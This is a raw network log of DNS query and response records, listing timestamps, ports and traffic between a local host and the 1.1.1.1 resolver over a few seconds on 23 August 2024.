Aug 23, 2024 18:43:33.744440079 CEST	53	60812	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.744592905 CEST	52944	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.744635105 CEST	49899	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.744792938 CEST	54151	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.745012999 CEST	59182	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.745166063 CEST	58676	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.745328903 CEST	56723	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.745392084 CEST	56383	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.745577097 CEST	55378	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.745754957 CEST	65068	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.745897055 CEST	53	50090	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.745908976 CEST	62674	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.746109962 CEST	60372	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.746141911 CEST	64719	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.746309042 CEST	56604	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.746469975 CEST	64853	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.746594906 CEST	54300	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.746640921 CEST	53097	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.746838093 CEST	60321	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.746922970 CEST	53	60441	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.746984959 CEST	59576	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.747129917 CEST	62746	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.747253895 CEST	53	54531	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.747849941 CEST	53	52262	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.748270035 CEST	53	56800	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.748677015 CEST	53	58536	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.749046087 CEST	53	62541	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.749491930 CEST	53	61392	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.751137018 CEST	53	59731	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.751616955 CEST	53	51100	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.751674891 CEST	53	58039	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.751806974 CEST	53	52875	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.751851082 CEST	53	57304	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.752382994 CEST	53	55045	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.752405882 CEST	53	49952	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.752693892 CEST	53	49530	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.753317118 CEST	53	53566	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.753590107 CEST	53	61713	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.753737926 CEST	53	61106	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.753746986 CEST	53	55489	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.753755093 CEST	53	51492	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.754069090 CEST	53	61701	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.754159927 CEST	53	54953	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.754297018 CEST	53	49520	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.754409075 CEST	53	55142	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.755430937 CEST	53	52055	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.755497932 CEST	53	64853	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.755542040 CEST	53	49899	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.755847931 CEST	53	52065	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.756036997 CEST	53	58346	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.756201029 CEST	53	60372	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.756329060 CEST	53	55378	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.757128954 CEST	53	62674	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.757513046 CEST	53	64719	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.757889032 CEST	53	62746	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.758124113 CEST	53	53097	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.758826971 CEST	53	54300	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.764672041 CEST	53	50963	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.765053034 CEST	53	51663	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.766765118 CEST	53	56068	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.771830082 CEST	53	59105	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.771982908 CEST	53	51709	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.774557114 CEST	53	53801	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.774985075 CEST	53	49563	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.775963068 CEST	53	52944	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.776618004 CEST	53	53049	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.776667118 CEST	53	59900	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.776959896 CEST	53	56723	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.777070045 CEST	53	50683	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.777163029 CEST	53	59182	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.777476072 CEST	53	61971	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.777565956 CEST	53	54151	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.777980089 CEST	53	58676	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.778928041 CEST	53	56604	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.779048920 CEST	53	60321	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.780061007 CEST	53	56383	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.908487082 CEST	53	59576	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.912148952 CEST	53	65068	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.280989885 CEST	61143	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.281591892 CEST	63091	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.282339096 CEST	54368	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.283092976 CEST	63723	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.283691883 CEST	63891	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.284533978 CEST	58163	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.284828901 CEST	53989	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.285233021 CEST	62723	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.285479069 CEST	57706	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.285913944 CEST	57442	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.286444902 CEST	60346	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.286672115 CEST	51857	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.286720037 CEST	49319	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.287337065 CEST	61738	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.287480116 CEST	51523	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.287820101 CEST	49627	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.288300037 CEST	49684	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.288645983 CEST	52453	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.288674116 CEST	57847	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.289302111 CEST	64662	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.289557934 CEST	55348	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.289618015 CEST	61195	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.290163040 CEST	56424	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.290502071 CEST	54813	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.290817022 CEST	62999	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.291107893 CEST	61305	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.291527033 CEST	61010	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.291989088 CEST	50594	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.292174101 CEST	53	54368	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.292247057 CEST	51118	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.292282104 CEST	61554	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.292526960 CEST	53	63091	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.292918921 CEST	54473	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.292978048 CEST	53	61143	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.294616938 CEST	53	63891	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.295414925 CEST	53	53989	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.295458078 CEST	59038	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.295838118 CEST	52146	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.295861959 CEST	53	52453	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.296324968 CEST	53	57442	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.296539068 CEST	53	62723	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.298501968 CEST	53	51857	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.298980951 CEST	50636	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.299146891 CEST	56295	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.299146891 CEST	50562	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.299305916 CEST	53	51523	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.299351931 CEST	53554	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.299911022 CEST	55254	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.300079107 CEST	59606	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.300180912 CEST	62805	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.300378084 CEST	65477	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.300415993 CEST	61979	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.300605059 CEST	59703	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.300753117 CEST	50180	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.300870895 CEST	57825	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.300874949 CEST	53	64662	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.300921917 CEST	57302	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.301131010 CEST	57917	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.301240921 CEST	62985	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.301379919 CEST	53	61195	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.301484108 CEST	55387	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.301636934 CEST	64800	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.301702023 CEST	61286	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.301748991 CEST	53	55348	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.301785946 CEST	50511	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.301881075 CEST	53	49627	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.302205086 CEST	64623	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.302216053 CEST	63523	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.302412033 CEST	53	54813	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.302454948 CEST	53355	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.302860975 CEST	60935	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.302880049 CEST	53	61305	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.303035021 CEST	54327	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.303107023 CEST	53	61010	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.303124905 CEST	58420	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.303224087 CEST	59929	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.303385019 CEST	53	51118	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.303388119 CEST	65121	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.303587914 CEST	59926	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.303600073 CEST	53137	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.303764105 CEST	53	49684	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.303775072 CEST	53	61554	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.303989887 CEST	53	54473	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.304208040 CEST	59858	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.304255962 CEST	53	50594	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.304336071 CEST	65479	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.304485083 CEST	58250	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.304687023 CEST	53892	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.305105925 CEST	65128	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.305143118 CEST	60840	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.305365086 CEST	52088	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.305392981 CEST	61428	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.305561066 CEST	57724	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.305774927 CEST	57553	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.305892944 CEST	63366	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.306055069 CEST	54910	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.306202888 CEST	61081	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.306358099 CEST	60979	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.306371927 CEST	53	59038	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.306499958 CEST	64293	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.306627035 CEST	54608	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.306657076 CEST	56761	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.306804895 CEST	58167	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.306982994 CEST	52479	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.307025909 CEST	57412	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.307261944 CEST	57940	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.307441950 CEST	64590	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.307602882 CEST	53259	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.307710886 CEST	59545	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.307796955 CEST	50416	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.307893038 CEST	58853	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.308082104 CEST	49314	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.308207989 CEST	50947	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.308388948 CEST	55809	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.308429003 CEST	59276	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.308587074 CEST	58737	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.308729887 CEST	57861	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.308885098 CEST	56195	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.308943987 CEST	63379	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.309101105 CEST	49492	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.309259892 CEST	62292	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.309437037 CEST	60416	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.309478998 CEST	65137	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.309645891 CEST	65264	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.309712887 CEST	64578	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.309873104 CEST	54984	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.310022116 CEST	53217	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:34.310041904 CEST	53	50636	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.310583115 CEST	53	50562	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.311574936 CEST	53	59606	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.312067986 CEST	53	56295	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.313026905 CEST	53	57917	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.313680887 CEST	53	55387	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.313692093 CEST	53	63523	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.313695908 CEST	53	50180	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.313703060 CEST	53	61286	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.315313101 CEST	53	53355	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.315640926 CEST	53	63723	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.315788031 CEST	53	65128	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.315903902 CEST	53	53137	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.316030025 CEST	53	65479	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.316169977 CEST	53	58167	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.316821098 CEST	53	58163	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.316838026 CEST	53	57553	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.316848993 CEST	53	61081	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.317600012 CEST	53	60979	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.317682981 CEST	53	64293	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.317744970 CEST	53	63366	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.317754984 CEST	53	49314	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.318110943 CEST	53	56761	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.318262100 CEST	53	52088	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.318411112 CEST	53	49319	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.318684101 CEST	53	57412	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.318701029 CEST	53	54608	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.319176912 CEST	53	54984	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.319271088 CEST	53	59545	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.319446087 CEST	53	64578	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.319457054 CEST	53	64590	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.319574118 CEST	53	63379	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.319844961 CEST	53	50947	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.320225954 CEST	53	65137	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.320235968 CEST	53	50416	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.320394993 CEST	53	53259	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.321069002 CEST	53	57847	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.321331024 CEST	53	57861	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.322891951 CEST	53	56424	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.323153973 CEST	53	62999	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.327492952 CEST	53	61738	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.329210043 CEST	53	52146	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.332426071 CEST	53	53554	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.333401918 CEST	53	55254	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.333930969 CEST	53	60935	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.334175110 CEST	53	50511	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.334482908 CEST	53	64800	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.334765911 CEST	53	64623	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.335330963 CEST	53	54327	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.335422039 CEST	53	59926	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.336360931 CEST	53	57825	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.336560011 CEST	53	57302	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.336771965 CEST	53	58420	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.337481976 CEST	53	61428	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.337565899 CEST	53	59858	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.337694883 CEST	53	58250	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.337879896 CEST	53	53892	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.339313984 CEST	53	54910	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.339323997 CEST	53	62292	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.339895964 CEST	53	49492	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.340962887 CEST	53	59276	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.341068983 CEST	53	55809	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.341475010 CEST	53	58853	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.341881990 CEST	53	53217	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.342472076 CEST	53	59929	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.344121933 CEST	53	52479	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.345093966 CEST	53	58737	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.345690012 CEST	53	57940	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.453161955 CEST	53	60346	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.458719015 CEST	53	65477	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.465533018 CEST	53	57706	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.471116066 CEST	53	57724	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.495321989 CEST	53	59703	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.500508070 CEST	53	60840	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.506982088 CEST	53	60416	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.507365942 CEST	53	56195	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.513559103 CEST	53	62985	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.526957035 CEST	53	61979	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:34.550282001 CEST	53	65264	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:35.111363888 CEST	53	62805	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:35.299595118 CEST	65121	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:36.315187931 CEST	65121	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:36.338887930 CEST	55675	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:36.554604053 CEST	53	55675	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:36.760659933 CEST	53	65121	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:36.760674000 CEST	53	65121	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:36.760682106 CEST	53	65121	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.957247972 CEST	59360	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.957822084 CEST	56485	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.958329916 CEST	61868	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.958859921 CEST	61403	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.959333897 CEST	56805	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.959811926 CEST	55687	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.960279942 CEST	59891	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.960767984 CEST	50485	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.961214066 CEST	58247	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.961672068 CEST	55788	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.962142944 CEST	54452	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.962599039 CEST	52448	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.963043928 CEST	50922	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.963459969 CEST	59710	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.963906050 CEST	60362	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.964364052 CEST	51581	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.964867115 CEST	64251	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.965306997 CEST	52191	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.965749025 CEST	56677	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.966233969 CEST	54657	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.966723919 CEST	64643	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.967196941 CEST	51727	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.967650890 CEST	54526	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.968143940 CEST	52141	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.968595982 CEST	63816	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.969091892 CEST	50231	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.969196081 CEST	53	56485	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.969568968 CEST	50501	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.970072985 CEST	60015	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.970576048 CEST	53	61868	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.970725060 CEST	53	59891	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.971580029 CEST	50994	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.971941948 CEST	53	59360	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.972117901 CEST	64338	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.972695112 CEST	53	50485	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.975779057 CEST	53	61403	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.975822926 CEST	53	54452	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.975837946 CEST	53	60362	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.976430893 CEST	53	59710	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.977268934 CEST	53	52448	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.978948116 CEST	53	56677	1.1.1.1	192.168.2.5
